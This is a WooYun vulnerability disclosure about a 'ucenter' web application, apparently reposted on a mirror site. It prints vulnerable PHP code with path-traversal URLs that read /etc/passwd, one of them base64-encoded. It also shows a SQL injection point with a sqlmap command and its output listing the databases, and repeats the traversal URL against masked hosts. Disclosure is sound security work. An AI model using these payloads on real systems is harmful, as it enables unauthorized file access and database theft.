乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-07-17: 细节已通知厂商并且等待厂商处理中 2015-07-17: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开 2015-07-20: 细节向第三方安全合作伙伴开放 2015-09-10: 细节向核心白帽子及相关领域专家公开 2015-09-20: 细节向普通白帽子公开 2015-09-30: 细节向实习白帽子公开 2015-10-15: 细节向公众公开
无需登录
文件读取#1看到include/get_file.php
@set_time_limit( 60 );if ( isset( $_GET['view'] ) && file_exists( $_GET['view'] ) ){ header( "Content-Type: application/octet-stream" ); header( "Content-Disposition: attachment; filename=".basename( $_GET['view'] ) ); readfile( $_GET['view'] );}else if ( isset( $_GET['view'] ) ){ echo $_GET['view']." 不能读取!";}?>
直接读取
/ucenter/include/get_file.php?view=../../../../../../../etc/passwd
任意文件读取#2tjbb/webmail_raw.php
function _striptext( $document ){ $search = array( "'<script[^>]*?>[^(document.getElementById)].*?</script>'si" ); $replace = array( "" ); $text = preg_replace( $search, $replace, $document ); return $text;}echo "<div align=\"center\" style=\"color:#FF0000;\" > <img border=\"0\" src=\"../images/bianmachange.gif\"/></div><hr size=\"1\" />";$file = base64_decode( $_GET['path'] );if ( file_exists( $file ) ){ echo file_get_contents( $file );}else{ echo "文件不存在";}?>
只需base64_encode一下
/ucenter/tjbb/webmail_raw.php?path=Li4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
sql注入ucenter/admin/wsconfig.php
header( "Content-Type:text/html;charset=GB2312" );session_start( );include( "../include/globalvar.h" );include( "../include/connectdb.php" );include( "./authorize.php" );include( "../include/printerror.php" );include( "../include/addsystemlog.php" );include( "../include/sendcmd.php" );if ( $_GET['act'] == "Edt" ){ $sql = "SELECT * FROM up_status_property WHERE id=".$_GET['id']; //注入1 $gDb->query( $sql ); $gDb->next_record( ); $callbackurl = $gDb->Record['callbackurl']; $verifyid = $gDb->Record['verifyid']; $valid_time = $gDb->Record['valid_time']; $valid_time = substr( $valid_time, 0, strpos( $valid_time, " " ) ); $actionurl = "wsconfig.php?act=Edt&id=".$_GET['id'];}else if ( $_GET['act'] == "Add" ){ $html = "\t\t<tr>\n\t\t\t<td height=\"35\" align=\"right\" class=\"btd\">本地/远程:</td>\n\t\t\t<td class=\"btd\"><select name=\"local_or_remote\"><option value=\"0\">本地</option><option value=\"1\" selected>远程</option></select> <font color=\"#FF0000\">*</font></td>\n\t\t</tr>"; $actionurl = "wsconfig.php?act=Add";}if ( $_SERVER['REQUEST_METHOD'] == "POST" ){ if ( $_GET['act'] == "Edt" ) { $sql = "UPDATE up_status_property SET callbackurl='".$_POST['callbackurl']."', verifyid='".$_POST['verifyid']."', valid_time='".$_POST['valid_time']." 23:59:59"."' WHERE id=".$_GET['id']; //注入2 $gDb->query( $sql ); printerror( "WEBSERVICE配置修改成功!", "sysinfo.php?kind=webservice" ); } else if ( $_GET['act'] == "Add" ) { $sql = "INSERT INTO up_status_property SET callbackurl='".$_POST['callbackurl']."', verifyid='".$_POST['verifyid']."', valid_time='".$_POST['valid_time']." 23:59:59"."', flag=".$_POST['local_or_remote']; $gDb->query( $sql ); printerror( "WEBSERVICE配置添加成功!", "sysinfo.php?kind=webservice" ); }}echo "\n<LINK href=\"css/common.css\" type=\"text/css\" rel=\"stylesheet\">\n";echo "<S";echo "CRIPT LANGUAGE=\"JavaScript\" src=\"../include/common.js\"></SCRIPT>\n<form name=\"wsForm\" method=\"POST\" action=\"";echo "\" onsubmit=\"return verifyInput();\">\n<table width=\"100%\" border=0>\n\t";echo $html;echo " <tr>\n\t\t<td height=\"40\" align=\"right\" class=\"btd\">授权码: </td>\n\t\t<td class=\"btd\"><input type=\"text\" name=\"verifyid\" value=\"";echo $verifyid;echo "\"> <font color=\"#FF0000\">*</font></td>\n\t</tr>\n\t<tr>\n\t\t<td height=\"40\" align=\"right\" class=\"btd\">有效期: </td>\n\t\t<td class=\"btd\"><input type='text' name='valid_time' onclick=\"onselectdate(this.form.valid_time);return false;\" readonly size=\"10\" value=\"";echo $valid_time;echo "\" class=\"bbox\" size=\"13\"> <font color=\"#FF0000\">*</font></td>\n\t</tr>\n\t<tr>\n\t\t<td height=\"85\" align=\"right\" class=\"btd\">回调地址: </td>\n\t\t<td class=\"btd\"><textarea name=\"callbackurl\" cols=\"50\" rows=\"4\">";echo $callbackurl;echo "</textarea> <font color=\"#FF0000\">*</font></td>\n\t</tr>\n\t<tr>\n\t\t<td height=\"40\" class=\"btd\"></td>\n\t\t<td>\n\t\t\t<input type=\"submit\" name=\"sub\" value=\"保 存\">\n\t\t\t<input type=\"button\" name=\"ret\" value=\"返 回\" onclick=\"window.location='sysinfo.php?kind=webservice'\"> \n\t\t</td>\n\t</tr>\n</table>\n</form>\n";echo "<s";echo "cript language=\"javascript\">\n<!--\nfunction verifyInput()\n{\n\tif(!killspace(document.wsForm.verifyid.value))\n\t{\n\t\talert(\"授权码不能为空!\");\n\t\tdocument.wsForm.verifyid.focus();\n\t\treturn false;\n\t}\n\tif(!killspace(document.wsForm.valid_time.value))\n\t{\n\t\talert(\"有效期不能为空!\");\n\t\tdocument.wsForm.valid_time.focus();\n\t\treturn false;\n\t}\n\tif(!killspace(document.wsForm.callbackurl.value))\n\t{\n\t\talert(\"回调?;echo "刂凡荒芪眨");\n\t\tdocument.wsForm.callbackurl.focus();\n\t\treturn false;\n\t}\n}\n//-->\n</script>\n";?>
sqlmap.py -u "**.**.**.**/ucenter/admin/addswitchmanage.php?act=E&id=1" -p "id" --dbs
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: id (GET) Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind (SELECT) Payload: act=E&id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))ToKi)---web application technology: Apacheback-end DBMS: MySQL 5.0.11available databases [9]:[*] `#mysql50#ucenter_08-12-26-17-21-57OURCE`[*] cluster[*] information_schema[*] mysql[*] ucenter[*] ucenter_big_tables[*] ucenter_gbk_bak[*] ucenter_org[*] ucenter_other_tables
案例
**.**.**.**/ucenter/include/get_file.php?view=../../../../../../../etc/passwd**.**.**.**/ucenter/include/get_file.php?view=../../../../../../../etc/passwd**.**.**.**/ucenter/include/get_file.php?view=../../../../../../../etc/passwd**.**.**.**/ucenter/include/get_file.php?view=../../../../../../../etc/passwd**.**.**.**/ucenter/include/get_file.php?view=../../../../../../../etc/passwd
危害等级:高
漏洞Rank:12
确认时间:2015-07-17 16:25
CNVD确认所述情况,已经由CNVD通过网站公开联系方式向软件生产厂商通报。
暂无